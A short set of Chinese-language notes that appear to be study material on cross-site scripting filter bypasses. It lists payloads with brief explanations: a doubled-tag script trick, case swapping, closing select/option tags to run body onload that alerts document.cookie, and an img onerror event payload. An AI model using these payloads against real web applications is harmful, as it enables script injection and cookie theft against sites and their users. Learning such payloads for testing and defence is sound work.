<scri<script>pt>alert(1)</script>
双写/大小写绕过(大写的话就改成大写的)
#</option></select><BODY ONLOAD=alert(document.cookie)>前面先进行闭<option>标签,并在<body>体中使用onload函数他是在加载白名单对象的时候,进行调用alert方法弹出cookie信息,最前面加#避免数据后面的payload传到服务器,就是为了让他的数据能够在浏览器页面进行显示
<script>alert(/xss/)</script>js弹窗
</select><img src=1 onerror=alert(/xss/)></option>事件型参数绕过,这个的意思就是为了闭合<select>,<option>标签,并插入一个没有的图片,使它出错然后执行alert弹窗命令